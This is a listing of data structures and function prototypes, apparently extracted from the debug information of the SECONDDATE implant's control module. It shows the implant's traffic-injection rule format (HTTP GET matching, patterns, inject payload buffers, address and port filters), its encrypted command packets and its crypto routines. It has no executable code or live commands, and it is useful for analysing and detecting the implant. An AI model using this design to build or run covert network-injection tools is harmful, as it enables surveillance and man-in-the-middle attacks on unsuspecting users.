Some functions and data structures from SECONDDATE implant control module (extracted using https://github.com/laanwj/dwarf_to_c)

SecondDate-3.1.1.0.c

/* Basetype: unsigned int */
typedef unsigned int size_t;
/* Basetype: unsigned char */
/* Basetype: short unsigned int */
/* Basetype: long unsigned int */
/* Basetype: signed char */
/* Basetype: short int */
/* Basetype: int */
/* Basetype: long long int */
/* Basetype: long long unsigned int */
typedef long long int __quad_t;
/* Basetype: long int */
typedef long int __off_t;
typedef __quad_t __off64_t;
typedef long int __time_t;
typedef long int __suseconds_t;
/* Basetype: char */
typedef unsigned int __socklen_t;
typedef struct _IO_FILE FILE;
typedef void _IO_lock_t;
struct _IO_FILE
{
  int _flags; /* +0x0 */
  char *_IO_read_ptr; /* +0x4 */
  char *_IO_read_end; /* +0x8 */
  char *_IO_read_base; /* +0xc */
  char *_IO_write_base; /* +0x10 */
  char *_IO_write_ptr; /* +0x14 */
  char *_IO_write_end; /* +0x18 */
  char *_IO_buf_base; /* +0x1c */
  char *_IO_buf_end; /* +0x20 */
  char *_IO_save_base; /* +0x24 */
  char *_IO_backup_base; /* +0x28 */
  char *_IO_save_end; /* +0x2c */
  struct _IO_marker *_markers; /* +0x30 */
  struct _IO_FILE *_chain; /* +0x34 */
  int _fileno; /* +0x38 */
  int _flags2; /* +0x3c */
  __off_t _old_offset; /* +0x40 */
  short unsigned int _cur_column; /* +0x44 */
  signed char _vtable_offset; /* +0x46 */
  char _shortbuf[1]; /* +0x47 */
  _IO_lock_t *_lock; /* +0x48 */
  __off64_t _offset; /* +0x4c */
  void *__pad1; /* +0x54 */
  void *__pad2; /* +0x58 */
  int _mode; /* +0x5c */
  char _unused2[52]; /* +0x60 */
};
struct _IO_marker
{
  struct _IO_marker *_next; /* +0x0 */
  struct _IO_FILE *_sbuf; /* +0x4 */
  int _pos; /* +0x8 */
};
typedef __time_t time_t;
typedef struct 
{
  long unsigned int __val[32]; /* +0x0 */
} __sigset_t;
struct timeval
{
  __time_t tv_sec; /* +0x0 */
  __suseconds_t tv_usec; /* +0x4 */
};
typedef long int __fd_mask;
typedef struct 
{
  __fd_mask __fds_bits[32]; /* +0x0 */
} fd_set;
struct option
{
  char *name; /* +0x0 */
  int has_arg; /* +0x4 */
  int *flag; /* +0x8 */
  int val; /* +0xc */
};
typedef int __jmp_buf[6];
struct __jmp_buf_tag
{
  __jmp_buf __jmpbuf; /* +0x0 */
  int __mask_was_saved; /* +0x18 */
  __sigset_t __saved_mask; /* +0x1c */
};
typedef struct __jmp_buf_tag jmp_buf[1];
typedef char *rl_compentry_func_t(char *, int);
typedef __socklen_t socklen_t;
typedef short unsigned int sa_family_t;
typedef short unsigned int uint16_t;
typedef unsigned int uint32_t;
typedef uint16_t in_port_t;
typedef uint32_t in_addr_t;
struct in_addr
{
  in_addr_t s_addr; /* +0x0 */
};
struct sockaddr_in
{
  sa_family_t sin_family; /* +0x0 */
  in_port_t sin_port; /* +0x2 */
  struct in_addr sin_addr; /* +0x4 */
  unsigned char sin_zero[8]; /* +0x8 */
};
struct tm
{
  int tm_sec; /* +0x0 */
  int tm_min; /* +0x4 */
  int tm_hour; /* +0x8 */
  int tm_mday; /* +0xc */
  int tm_mon; /* +0x10 */
  int tm_year; /* +0x14 */
  int tm_wday; /* +0x18 */
  int tm_yday; /* +0x1c */
  int tm_isdst; /* +0x20 */
  long int tm_gmtoff; /* +0x24 */
  char *tm_zone; /* +0x28 */
};

typedef struct
{
  unsigned char enabled; /* +0x0 */
  unsigned char checkHTTPGET; /* +0x1 */
  unsigned char checkPattern; /* +0x2 */
  unsigned char tcpFlags; /* +0x3 */
  unsigned char injectflag; /* +0x4 */
  unsigned int index; /* +0x8 */
  unsigned int start_index; /* +0xc */
  unsigned int stop_index; /* +0x10 */
  unsigned int tagOffset; /* +0x14 */
  unsigned int u_timestamp; /* +0x18 */
  unsigned int e_timestamp; /* +0x1c */
  unsigned int srcAddrFilter; /* +0x20 */
  unsigned int srcAddrFilterMask; /* +0x24 */
  unsigned int dstAddrFilter; /* +0x28 */
  unsigned int dstAddrFilterMask; /* +0x2c */
  unsigned int protocolFilter; /* +0x30 */
  short unsigned int srcPortFilter; /* +0x34 */
  short unsigned int dstPortFilter; /* +0x36 */
  unsigned int minInterval; /* +0x38 */
  unsigned int maxInjections; /* +0x3c */
  unsigned int injectWindow; /* +0x40 */
  unsigned int injectLen; /* +0x44 */
  unsigned int currentInjections; /* +0x48 */
  unsigned int totalInjections; /* +0x4c */
  unsigned int totalMisses; /* +0x50 */
  unsigned int nextInjectTime; /* +0x54 */
  unsigned int injectWindowEnd; /* +0x58 */
  unsigned char pattern[256]; /* +0x5c */
  unsigned char inject[512]; /* +0x15c */
} RULE_TYPE;

struct LOG_ENTRY_
{
  unsigned int index; /* +0x0 */
  unsigned int srcAddr; /* +0x4 */
  unsigned int dstAddr; /* +0x8 */
  short unsigned int srcPort; /* +0xc */
  short unsigned int dstPort; /* +0xe */
  unsigned int timeStamp; /* +0x10 */
  unsigned int rule; /* +0x14 */
  char protocol; /* +0x18 */
  char dataBuffer[40]; /* +0x19 */
};
typedef struct LOG_ENTRY_ LOG_ENTRY;

typedef struct
{
  unsigned int version; /* +0x0 */
  unsigned int logEntries; /* +0x4 */
  unsigned int ruleCount; /* +0x8 */
  unsigned int timeStamp; /* +0xc */
} SD_INFO;
typedef struct
{
  int munge; /* +0x0 */
  int magic; /* +0x4 */
  int checkSum; /* +0x8 */
  unsigned char encCounter[8]; /* +0xc */
  int encMagic; /* +0x14 */
  int sequenceNum; /* +0x18 */
  unsigned int type; /* +0x1c */
  int errCode; /* +0x20 */
  unsigned int logTime; /* +0x24 */
  union
  {
    RULE_TYPE rule;
    SD_INFO info;
    LOG_ENTRY log[15];
  }; /* +0x28 */
} SD_PDUTYPE;

typedef unsigned char uchar;
char *completerFunc(char *keyword, int state);
int sendCommand(int sd, SD_PDUTYPE *sdPdu, SD_PDUTYPE *sdPduResp);
int main(int argc, char **argv);
/* inline int atoi(char *__nptr) */
/* inline long int strtol(char *__nptr, char **__endptr, int __base) */
void sighandler(int sig);

typedef long unsigned int ulong;
typedef short unsigned int ushort;
typedef unsigned char uint8;
struct Control_nodeHeader
{
  long unsigned int nodeNum; /* +0x0 */
};
typedef struct Control_nodeHeader Control_nodeHeader;
typedef struct 
{
  uint8 counter[8]; /* +0x0 */
  uint8 padding[8]; /* +0x8 */
} Encryption_PaddedCounter;
int Encryption_incrementCounter(uchar *counter);
int Encryption_expandKey(uchar *cv, uchar *keySchedule);
int Encryption_compareCounters(uchar *counter, uchar *counter2);
int Encryption_isValidCounter(uchar *counter, uchar *lastUsedCounter);
int Encryption_encryptCounter(uchar *counter, uchar *data);
void Encryption_decryptCounter(uchar *counter, uchar *data);
int ecbModeEncryptBlock(uchar *plaintext, uchar *ciphertext, uchar *keySchedule);
int counterModeEncryptBlock(uchar *plaintext, uchar *ciphertext, ushort plaintextLength, Encryption_PaddedCounter *counter, uchar *keySchedule);
int Encryption_counterModeEncrypt(uchar *plaintext, uchar *ciphertext, long int length, uchar *counter, uchar *keySchedule);
int Encryption_counterModeDecrypt(uchar *plaintext, uchar *ciphertext, long int length, uchar *counter, uchar *keySchedule);
int ofbModeEncryptBlock(uchar *plaintext, uchar *ciphertext, ushort plaintextLength, uchar *iv, uchar *keySchedule);
int Encryption_ofbModeEncrypt(uchar *plaintext, uchar *ciphertext, long int length, uchar *iv, long int *remainder, uchar *keySchedule);
int Encryption_ofbModeDecrypt(uchar *plaintext, uchar *ciphertext, long int length, uchar *iv, long int *remainder, uchar *keySchedule);
void Encryption_mungeControlHeader(Control_nodeHeader *nh);
void Encryption_randSeed();
/* inline void Encryption_addSeed(uchar *seed, long int numSeedBytes) */
void Encryption_randRekey();
void Encryption_randBytes(uchar *bytes, long int size);
/* inline void Encryption_randInit() */
long unsigned int Encryption_randGen();
typedef long unsigned int uint32;
void Rc6_encrypt(uint8 *inBlock, uint8 *outBlock, uint32 *keySchedule);
/* inline long unsigned int be32_to_le32_inline(long unsigned int x) */
void Rc6_decrypt(uint8 *inBlock, uint8 *outBlock, uint32 *keySchedule);
void Rc6_expandKey(uint8 *cv, uint32 *keySchedule);
int Encryption_Sha1(uint8 *data, int data_len, uint8 *digest);
int Encryption_Sha1d(uint8 *data, int data_len, uint8 *digest);
int Encryption_Sha1dVerify(uint8 *data, int data_len, uint8 *digest);